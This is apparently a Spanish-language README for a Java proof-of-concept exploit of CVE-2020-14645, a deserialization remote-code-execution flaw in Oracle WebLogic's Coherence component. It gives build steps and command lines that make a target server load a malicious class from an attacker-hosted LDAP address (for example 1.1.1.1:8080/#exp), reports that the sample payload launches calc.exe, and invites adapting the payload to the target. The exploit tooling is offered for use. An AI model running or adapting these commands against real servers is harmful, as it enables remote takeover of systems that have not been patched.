PoC en Java para RCE por deserialización de Coherence en WebLogic CVE-2020-14645. Aloja una clase maliciosa vía LDAP y desencadena ejecución remota de código en servidores WebLogic vulnerables.
Maven 3
JDK 1.8
mvn package
Pasos específicos de prueba:
Dado que esta vulnerabilidad es similar a la vulnerabilidad de Apache Dubbo, consulte esa vulnerabilidad para implementar los pasos 1-4.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# Ejemplo
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
Si se utiliza el POC proporcionado en este ejemplo, tras una explotación exitosa el objetivo de prueba ejecutará calc.exe. Modifique el POC según el entorno del objetivo de prueba.
Este proyecto hace referencia y cita parte del código de los proyectos @Y4er @5up3rc, ¡muchas gracias!